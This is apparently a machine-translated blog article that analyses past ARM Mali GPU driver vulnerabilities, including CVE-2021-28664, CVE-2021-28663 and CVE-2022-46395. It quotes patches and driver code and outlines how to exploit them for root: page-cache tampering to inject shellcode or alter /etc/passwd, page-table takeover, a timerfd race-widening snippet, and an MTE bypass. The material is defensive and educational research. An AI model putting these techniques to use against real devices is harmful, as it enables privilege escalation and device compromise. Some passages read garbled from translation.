Location>code7788 >text

GPU Driver Vulnerabilities: A Peek into the Technical Mysteries of Driver Exploitation

Popularity:266 ℃/2024-12-16 01:21:06

GPU Driver Vulnerabilities: A Peek into the Technical Mysteries of Driver Exploitation

This paper attempts to introduce some of the exploration of kernel vulnerability exploitation techniques done by security researchers around the attack surface of GPU drivers, using GPU vulnerabilities as a guide.

Background

Currently the mobile SOC platform consists of multiple hardware modules, the common hardware modules are: CPU, GPU, Modem baseband processor, ISP (image processor), etc. These hardware modules are interconnected through the hardware bus and work together to accomplish the task.

image

For GPU-driven vulnerability research, one of the key features we need to look at is theThe GPU and CPU share the same RAM. On the CPU side, the operating system manages the page table of the CPU MMU to realize the mapping of virtual addresses to physical addresses.

image

The GPU also has its own MMU, but the GPU's page table is managed by the GPU driver in the CPU kernel, which limits the range of physical addresses that the GPU can access.

image

In actual business use, the CPU generally allocates a section of physical memory and then maps it to the GPU, which takes out data from the shared memory to complete the computation, rendering and then writes the results back to the shared memory, thus completing the interaction between the GPU and the GPU. For GPU driver security research, the special attack surface is due to its need to maintain the GPU page table, this process is more complex, involving the cooperation of various modules in the kernel, very easy to have problems, and there have been a number of security vulnerabilities due to the failure of the GPU page table management in history.

image

In the case of the ARM Mali driver, for example, a few of the more representative vulnerabilities that have appeared over the years are listed below:

loophole typology loophole in the original language
CVE-2021-39793 Page permission error Tampering Read-only mapping to physical pages of user processes
CVE-2021-28664 Page permission error Tampering Read-only mapping to physical pages of user processes
CVE-2021-28663 GPU MMU Operation Exception Physical Page UAF
CVE-2023-4211 Conditional Competition UAF SLUB Object UAF
CVE-2023-48409 integer overflow heap overflow
CVE-2023-26083 kernel address leakage kernel address leakage
CVE-2022-46395 Conditional Competition UAF Physical Page UAF

The first three of these vulnerabilities are in managing GPU page table mappings, and the last few are the usual driver vulnerability types

CVE-2021-28664

Analyzing code downloads:/developer/Files/downloads/mali-drivers/kernel/mali-bifrost-gpu/

Let's start with the simplest vulnerability, which was Mali's first notable vulnerability, along with CVE-2021-28664, which was exploited by theProject Zero The captured in-the-wild exploit has the following patch

 static struct kbase_va_region *kbase_mem_from_user_buffer(
                struct kbase_context *kctx, unsigned long address,
                unsigned long size, u64 *va_pages, u64 *flags)
 {
[...]
+       int write;
[...]
+       write = reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR);
+
 #if KERNEL_VERSION(4, 6, 0) > LINUX_VERSION_CODE
        faulted_pages = get_user_pages(current, current->mm, address, *va_pages,
 #if KERNEL_VERSION(4, 4, 168) <= LINUX_VERSION_CODE && \
 KERNEL_VERSION(4, 5, 0) > LINUX_VERSION_CODE
-                       reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
-                       pages, NULL);
+                       write ? FOLL_WRITE : 0, pages, NULL);
 #else
-                       reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
+                       write, 0, pages, NULL);
 #endif
 #elif KERNEL_VERSION(4, 9, 0) > LINUX_VERSION_CODE
        faulted_pages = get_user_pages(address, *va_pages,
-                       reg->flags & KBASE_REG_CPU_WR, 0, pages, NULL);
+                       write, 0, pages, NULL);
 #else
        faulted_pages = get_user_pages(address, *va_pages,
-                       reg->flags & KBASE_REG_CPU_WR ? FOLL_WRITE : 0,
-                       pages, NULL);
+                       write ? FOLL_WRITE : 0, pages, NULL);
 #endif

The key point of the Patch is to replace the get_user_pages parameter in thereg->flags & KBASE_REG_CPU_WRSwitched toreg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR), these two tags work as follows:

  • KBASE_REG_CPU_WR: Indicates that the reg can be mapped to a userland process with write access.
  • KBASE_REG_GPU_WR: Indicates that the reg is able to map write permissions to the GPU.

The type of reg isstruct kbase_va_regionThe MALI driver uses kbase_va_region to manage physical memory, including physical memory request/release, GPU/CPU page map management, and so on.

image

The key elements of the diagram are listed below:

  • The cpu_alloc and gpu_alloc in kbase_va_region point to kbase_mem_phy_alloc, which indicates the physical pages owned by the reg, and cpu_alloc = gpu_alloc in most scenarios.
  • The flags field of kbase_va_region controls the permissions of the driver when mapping regs. If the flags is KBASE_REG_CPU_WR, it means that the reg is able to be mapped by the CPU as writable. Without this flag, it is not allowed to map regs to the CPU process in writable mode, so as to make sure that the process can not modify these physical pages.

Core idea: The driver uses kbase_va_region to represent a set of physical memory that can be mapped by user processes on the CPU and by the GPU, with mapping permissions controlled by the reg->flags field.

Returning to the vulnerability itself, the key code in its call path is as follows:

  • kbase_api_mem_import

    1. u64 flags = import->;

    2. kbase_mem_import(kctx, import->, u64_to_user_ptr(import->), import->, &import->out.gpu_va, &import->out.va_pages, &flags);

      1. copy_from_user(&user_buffer, phandle

      2. uptr = u64_to_user_ptr(user_buffer.ptr);

      3. kbase_mem_from_user_buffer(kctx, (unsigned long)uptr, user_buffer.length, va_pages, flags)

        1. struct kbase_va_region *reg = kbase_alloc_free_region(rbtree, 0, *va_pages, zone);
        2. kbase_update_region_flags(kctx, reg, *flags) // Set reg->flags according to the flags provided by the userland.
        3. faulted_pages = get_user_pages(address, *va_pages, reg->flags & KBASE_REG_GPU_WR, 0, pages, NULL);

The vulnerability lies in the fact that the get_user_pages parameter is passed with KBASE_REG_GPU_WR in mind, not KBASE_REG_CPU_WR, and the third parameter of get_user_pages is 0 when reg->flags is KBASE_REG_CPU_WR.

/*
 * This is the same as get_user_pages_remote(), just with a
 * less-flexible calling convention where we assume that the task
 * and mm being operated on are the current task's and don't allow
 * passing of a locked parameter.  We also obviously don't pass
 * FOLL_REMOTE in here.
 */
long get_user_pages(unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(current, current->mm, start, nr_pages,
				       pages, vmas, NULL, false,
				       gup_flags | FOLL_TOUCH);
}

get_user_pages traverses the process page table based on the va (start) provided by the user process, and returns a pointer to the page structure corresponding to the physical address of the va, which is saved in the pages array.

image

I.e., find the process page table based on task_struct->mm, and traverse the table to get the physical address.

If gup_flags is 1, it means that the page corresponding to the va will be written to the physical page after getting the va, and then the read-only and COW pages need to be handled additionally within get_user_pages to avoid the physical page corresponding to these special vas being modified and causing unintended behavior.

  • If vma is read-only, the API returns the error code
  • The VA's are mapped to COW pages, and the copy-on-write is done within the API and the newly allocated page is returned.

image

When gup_flags is 0, then the result of the page table traversal is returned directly (P0)

For this vulnerability, we can create areg->flagsbecause ofKBASE_REG_CPU_WR(used form a nominal expression)kbase_va_regionWhen you import a page, you can fetch any va page in the process to thekbase_va_region, and finally mapping it to a user-state process with writable permissions, which enables tampering with the physical pages corresponding to any read-only mapping in the process.

This original language to be further utilized need to rely on the operating system mechanism, first of all, the introduction of the simplest way of utilization, the Linux kernel in the processing of the file system in the disk, will be read from the disk to do the physical page cache to accelerate the performance of the file access, and at the same time to reduce the duplication of the physical pages of the file, reduce overhead

image

If shown:

  • When a process tries to read a physical page, such as a read-only permission mmap, the kernel searches the page cache and returns if it finds one; otherwise, it loads the physical page from disk into the Page Cache and returns
  • If it's a write, there's a corresponding flush cache mechanism.

Specifically, when two processes mmap a file with read-only permissions at the same time, the VA of both processes points to the same physical page
image

This way, when we use the vulnerability to modify the physical page in the Page Cache, other processes will also be affected, because they are all mapped to the same physical address, so the attack idea comes:

  • Read-only mapping Exploit tampering with its physical page in the Page Cache, injecting shellcode into it, and then lifting privileges when invoked by an elevated privilege process
  • Modify /etc/passwd in a similar fashion to complete the authorization.

In addition to modifying the file system's Page Cache, there is another very good target on the Android platform. The binder driver will map a read-only page to the userland process, and the data structure inside is flat_binder_object, and inside binder_transaction_buffer_release will The flat_binder_object->handle is used in the binder_transaction_buffer_release, and the related code is as follows:

image

First, binder_get_node finds the node, then binder_put_node is called to reduce the reference count of the node, and the node is released when the reference to the node reaches zero.

Since the physical page where flat_binder_object is located cannot be modified by the user state, this process can be guaranteed to be correct, and when we read only the physical page to write the vulnerability tampering with flat_binder_object->handle pointing to another node, triggering binder_transaction_buffer_ release can cause the node reference count to become unbalanced.

image

Finally, the vulnerability can be converted to a UAF for binder_node, which then employs theCVE-2019-2205 It is sufficient to exploit the vulnerability in the same way as the exploit.

Additionally a similar vulnerability was already present in Qualcomm GPU drivers in 2016.CVE-2016-2067

image

The same business scenario also means that the same type of vulnerability can arise

CVE-2021-28663

This vulnerability is a physical page UAF vulnerability caused by the Mali driver when managing the physical page mapping of the GPU. In order to understand this vulnerability, you first need to have an understanding of the code related to the Mali driver, as mentioned in the previous section, Mali uses the kbase_va_region object to represent the physical memory resources, and then the CPU user process and the GPU can be mapped on-demand to access the physical memory. The

image

The creation of the kbase_va_region is located in the kbase_api_mem_alloc interface with the following key code:

  • kbase_api_mem_alloc

    • kbase_mem_alloc(kctx, alloc->in.va_pages, alloc->in.commit_pages, alloc->, &flags, &gpu_va);

      1. reg = kbase_alloc_free_region(rbtree, 0, va_pages, zone); // Allocate reg

      2. kbase_reg_prepare_native(reg, kctx, base_mem_group_id_get(*flags))

        1. reg->cpu_alloc = kbase_alloc_create(kctx, reg->nr_pages, KBASE_MEM_TYPE_NATIVE, group_id);
        2. reg->gpu_alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
      3. kbase_alloc_phy_pages(reg, va_pages, commit_pages) // Allocate physical memory for reg

      4. if *flags & BASE_MEM_SAME_VA

        • kctx->pending_regions[cookie_nr] = reg;
        • cpu_addr = vm_mmap(kctx->filp, 0, va_map, prot, MAP_SHARED, cookie); // Mapping physical memory to GPU and CPU page tables
      5. else

        • kbase_gpu_mmap(kctx, reg, 0, va_pages, 1) // Map Physical Memory to GPU Page Tables

          • Edit GPU Page Table Insertion Mapping
          • atomic_inc(&alloc->gpu_mappings); // Add gpu_mappings to record references to GPUs.

with regards toBASE_MEM_SAME_VAIn this case, the driver will do special treatment, SAME_VA means that when mapping the reg, the virtual address of the GPU and CPU are the same, this may be to facilitate the data transfer between the pointer transfer.

image

If there is no settingBASE_MEM_SAME_VAthen it will map physical memory to the GPU between them, otherwise it will map physical memory to the GPU and CPU sides with the same VA via vm_mmap --> kbase_mmap --> kbasep_reg_mmap.

Both use kbase_gpu_mmap to map the physical memory corresponding to the reg into the GPU's page table.

The release of kbase_va_region is located in the kbase_api_mem_free interface with the following key code:

  • kbase_api_mem_free

    • reg = kbase_region_tracker_find_region_base_address(kctx, gpu_addr);

    • err = kbase_mem_free_region(kctx, reg);

      • kbase_gpu_munmap(kctx, reg); // Remove GPU mapping

      • kbase_free_alloced_region(reg);

        1. kbase_mem_phy_alloc_put(reg->cpu_alloc);
        2. kbase_mem_phy_alloc_put(reg->gpu_alloc);
        3. kbase_va_region_alloc_put(kctx, reg);

The general logic of this is to first find reg according to gpu_addr, and then release reg and reg->xx_alloc references, for this kind of complex object management, you can first analyze the relationship between the objects according to the normal process, kbase_va_region and the life cycle related fields are as follows:

image

The above figure represents a scenario where kbase_api_mem_alloc creates non-SAME_VA memory. kbase_gpu_mmap is executed by adding one to the gpu_mappings, and then when it is freed via kbase_api_mem_free, it decreases the reference counts of both kbase_va_region and kbase_mem_ phy_alloc will be freed by decrementing the reference counts of kbase_va_region and kbase_mem_phy_alloc to zero.

In case of SAME_VA, the situation is as follows, the difference is that SAME_VA memory in kbase_api_mem_alloc will call vm_mmap to map the reg to both the CPU and GPU side, which needs to increase the corresponding reference counts (va_refcnt, kref, gpu_mappings), and then decrease the corresponding reference counts when munmap process VA, the corresponding reference counts are decreased.

image

With a general knowledge of the driver's object management, look specifically at the two interfaces kbase_api_mem_alias and kbase_api_mem_flags_change that the vulnerability is related to, and the functionality that each utilizes:

  • kbase_api_mem_alias: creates an alias map, i.e. a new reg is allocated to share kbase_mem_phy_alloc with other existing regs.
  • kbase_api_mem_flags_change: release physical pages from kbase_mem_phy_alloc

The key code for kbase_api_mem_alias is as follows:

  • kbase_mem_alias

    1. reg = kbase_alloc_free_region(&kctx->reg_rbtree_same, 0, *num_pages, KBASE_REG_ZONE_SAME_VA);
    2. reg->gpu_alloc = kbase_alloc_create(kctx, 0, KBASE_MEM_TYPE_ALIAS,
    3. reg->cpu_alloc = kbase_mem_phy_alloc_get(reg->gpu_alloc);
    4. aliasing_reg = kbase_region_tracker_find_region_base_address( kctx, (ai[i]. >> PAGE_SHIFT) << PAGE_SHIFT);
    5. alloc = aliasing_reg->gpu_alloc;
    6. reg->gpu_alloc->[i].alloc = kbase_mem_phy_alloc_get(alloc);
    7. kctx->pending_regions[gpu_va] = reg;

The main thing is to increase the reference count (kref) of alloc and put it into kctx->pending_regions, after which the process will do CPU and GPU mapping via mmap (kbase_context_mmap​)

if (reg->gpu_alloc->type == KBASE_MEM_TYPE_ALIAS) {
	u64 const stride = alloc->;
	for (i = 0; i < alloc->; i++) { // 映射 aliased 中的各个 alloc 并增加 gpu_mappings
		if (alloc->[i].alloc) {
			err = kbase_mmu_insert_pages(kctx->kbdev,
					&kctx->mmu,
					reg->start_pfn + (i * stride),
					alloc->[i].alloc->pages + alloc->[i].offset,
					alloc->[i].length,
					reg->flags & gwt_mask,
					kctx->as_nr,
					group_id);
			kbase_mem_phy_alloc_gpu_mapped(alloc->[i].alloc);
		}
	}

创建别名映射进程调用 mmap 前后, reg 对象相关引用情况如下:

image

在 kbase_api_mem_alias 里面增加 aliased[i]->kref 确保其在使用过程中不会被释放,after that kbase_mmap Increase when mapping memory aliased[i]->gpu_mappings Record its being GPU Number of mappings,increase at the same time reg->va_refcnt Record its being CPU Number of mappings,There's nothing wrong with this process,Ensure by reference counting that the aliased The objects in the。

The problem lies in the fact that kbase_api_mem_flags_change can release the physical pages in it without releasing the alloc:

  • kbase_api_mem_flags_change

    • kbase_mem_flags_change

      1. reg = kbase_region_tracker_find_region_base_address(kctx, gpu_addr);
      2. Checksum atomic_read(&reg->cpu_alloc->gpu_mappings) > 1
      3. kbase_mem_evictable_make(reg->gpu_alloc); // Release physical pages in alloc

kbase_api_mem_flags_change can utilize kbase_mem_evictable_make to put gpu_alloc into a chain table managed by the driver itself (kctx->evict_list) The driver releases all gpu_allocs hanging on the link when the kernel points to a shrink operation.

  • kbase_mem_evictable_make

    1. kbase_mem_shrink_cpu_mapping(kctx, gpu_alloc->reg, 0, gpu_alloc->nents); // remove CPU mapping
    2. list_add(&gpu_alloc->evict_node, &kctx->evict_list); // add to the chain table

Code to release kbase_mem_phy_alloc physical pages when shrinking:

  • kbase_mem_evictable_reclaim_scan_objects

    1. kbase_mem_shrink_gpu_mapping(kctx, alloc->reg, 0, alloc->nents); // Delete GPU page table entries

      • kbase_mmu_teardown_pages(kctx->kbdev, &kctx->mmu, reg->start_pfn + new_pages, delta, kctx->as_nr);
    2. kbase_free_phy_pages_helper(alloc, alloc->evicted); // Release the physical page

kbase_mem_flags_change checks the gpu_mappings before calling kbase_mem_evictable_make, which probably means that if the reg has been mapped multiple times by the GPU, it can't perform a physical memory free operation, but going back to the flow of alias, the gpu_mappings in the aliased array are still 1 at the end of kbase_api_mem_make. But back to the alias process, at the end of kbase_api_mem_ alias, the gpu_mappings in the aliased array is still 1.

At this point, kbase_mem_flags_change is called to put aliased[i] into kctx->evict_list, and the value inside alloc->pages remains unchanged.

The reg created by the mmap mapping kbase_mem_alias is then called to map the physical pages (alloc->pages) in aliased[i] to the GPU side, assuming that the mapped VA is ALIAS_VA.

Finally, the shrink mechanism is triggered to release the physical page in aliased[i], after which ALIAS_VA also points to the released physical page, resulting in a physical page UAF.

image

Review the root cause of the vulnerability again, the vulnerability is the driver in the establishment of alias mapping of gpu_mappings management improper, combined with kbase_api_mem_flags_change release physical page logic, to reach the physical page UAF, the vulnerability of the excavation of personal understanding of the need to analyze the lifecycle of the memory object (heap, physical memory), and then combined with the timing of the APIs to see if there is unintended behavior. This kind of vulnerability mining personally understand that we need to first analyze the life cycle of memory objects (heap, physical memory), and then combine the timing of each API to see if there will be unintended behavior, the focus is still on the logic of the object's release, application, and copy.

Physical page UAF vulnerability exploitation techniques are now more mature, here are a few commonly used ways:

  • Tampering with process page tables: allocate a large number of physical pages freed from process page table footprints via fork + mmap, and then modify the page tables via the GPU to enable arbitrary physical memory reads and writes.
  • GPU page table tampering: allocate physical pages freed by GPU page table placeholders through the GPU driver interface, and then modify the page table to achieve arbitrary physical memory reads and writes through the GPU.
  • Tampering with kernel objects: by ejecting kernel objects (e.g., task_struct, cred) placeholders, and then the GPU modifies the objects to achieve utilization of the

CVE-2022-46395

The utilization path of the previous two vulnerabilities is probably: discover a new vulnerability, dig a new vulnerability exploitation to complete the utilization, this section of this vulnerability is the vulnerability is converted to CVE-2021-28663, because the ability of 28663 is really too powerful, the use of physical page UAF is simple, direct, the current heap of vulnerabilities on the utilization of the heap is also gradually converted to the physical page UAF (Dirty Pagetable

The vulnerability is a conditional contention vulnerability, where other threads can release the physical page corresponding to mapped_evt after kbase_vmap_prot

static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                  
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

To expand the time window of race, the authors utilize timerfd Clock interrupt technology

  migrate_to_cpu(0);   //<------- pin this task to a cpu

  int tfd = timerfd_create(CLOCK_MONOTONIC, 0);   //<----- creates timerfd
  //Adds epoll watchers
  int epfds[NR_EPFDS];
  for (int i=0; i<NR_EPFDS; i++)
    epfds[i] = epoll_create1(0);

  for (int i=0; i<NR_EPFDS; i++) {
    struct epoll_event ev = { .events = EPOLLIN };
    epoll_ctl(epfd[i], EPOLL_CTL_ADD, fd, &ev);
  }  
  
  timerfd_settime(tfd, TFD_TIMER_ABSTIME, ...);  //<----- schedule tfd to be available at a later time

  ioctl(mali_fd, KBASE_IOCTL_SOFT_EVENT_UPDATE,...); //<---- tfd becomes available and interrupts this ioctl  

The general idea is to set off a clock interrupt between kbase_vmap_prot and *mapped_evt, thus expanding the time window, and releasing the physical page corresponding to mapped_evt between the two steps, you will be able to achieve the ability of physical page UAF.

image

mapped_evt has a controlled offset within the page and writes 0 or 1, summarizing the vulnerability in the original language of physical memory UAF writes, which can only have a value of 0 or 1

static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    /* Allocate based on the size to reduce internal fragmentation of vmem */
    if (alloc_size > KBASE_MEM_PHY_ALLOC_LARGE_THRESHOLD)
        alloc = vzalloc(alloc_size);
    else
        alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

When kbase_alloc_create allocates kbase_mem_phy_alloc, it will call vzalloc to allocate memory. The logic of vzalloc is to calculate the number of physical pages to be allocated according to the size, and then call alloc_page to allocate the physical pages one by one, which can be utilized to take up the physical pages that have just been released relatively fast ( slab cross cache time is relatively long)

According to the previous vulnerability analysis, we know that gpu_mappings controls the release of physical pages, and if it is modified to 0 or 1 by UAF, it can release a physical page in an alias-mapped kbase_mem_phy_alloc early, resulting in a physical page UAF

struct kbase_mem_phy_alloc {
	struct kref           kref;
	atomic_t              gpu_mappings;
	size_t                nents;
	struct tagged_addr    *pages;
	struct list_head      mappings;

image

Once unrestricted physical page UAF reads and writes have been implemented, it's time for the usual exploitation process. The core of this exploit is to utilize the physical memory management structure of the GPU driver to convert a restricted UAF write into an unrestricted physical page UAF.

Attacking GPUs with non-GPU vulnerabilities

While the previous cases exploited the GPU itself, this case converts other driver and module vulnerabilities (heap overflow vulnerability in the camera driver) into GPU vulnerabilities to realize a physical page UAF vulnerability. The core idea is the same as that of CVE-2022-46395, which is to tamper with the gpu_mappings of the kbase_mem_phy_alloc to The core idea is the same as CVE-2022-46395.

static inline struct kbase_mem_phy_alloc *kbase_alloc_create(
        struct kbase_context *kctx, size_t nr_pages,
        enum kbase_memory_type type, int group_id)
{
    ...
    size_t alloc_size = sizeof(*alloc) + sizeof(*alloc->pages) * nr_pages;
    ...
    alloc = kzalloc(alloc_size, GFP_KERNEL);
    ...
}

One interesting point is that researchers have found that when MTE is enabled in the Android kernel, there is still a 50% probability that the overflow can be completed without being detected, and when MTE detects the overflow, it does not lead to kernel panic, but only kills the user's process, which gives the attacker unlimited attempts, which is equivalent to Bypassing the MTE.

image

summarize

Since CVE-2021-28663/CVE-2021-28664, researchers have been gradually focusing on and investing in GPU driver security, from mining GPU-specific vulnerabilities in the beginning to gradually converting various general vulnerabilities to GPU vulnerabilities later on, the core reason is that GPU drivers themselves are too powerful. As long as you can control the page table of the GPU hardware, you can read and write any physical page, and because it is independent hardware, you can directly Bypass the CPU side of the security features (such as KNOX, PAC, MTE), Patch kernel code.

GPU security research has also brought another direction of vulnerability exploitation, GPU drivers are prone to physical memory UAF because they have to manage physical memory, after the exploitation means of physical UAF was unearthed, people found that this original language is really too powerful, and a lot of techniques for converting different vulnerabilities into physical page UAF emerged later, such asDirty Pagetable, USMA, pipe_buffer-> page pointer hijacking, etc.

One thing that can also be learned from the path of GPU attacks is that the fixing of an exploit does not mean the end of the exploit's life, and if the original language of an exploit is too powerful and good to be used, one can consider converting other exploits towards it, thus reusing the historical experience of exploiting the exploit.

Reference Links

  • Internal of the Android kernel backdoor vulnerability
  • Two bugs with one PoC: Roo2ng Pixel 6 from Android 12 to Android 13
  • The inside story of our CVE-2019-2025 exploit
  • /docs/eu-16/materials/
  • Rooting with root cause: finding a variant of a Project Zero bug
  • Off-By-One 2024 Day 1 - GPUAF Using a general GPU exploit tech to attack Pixel8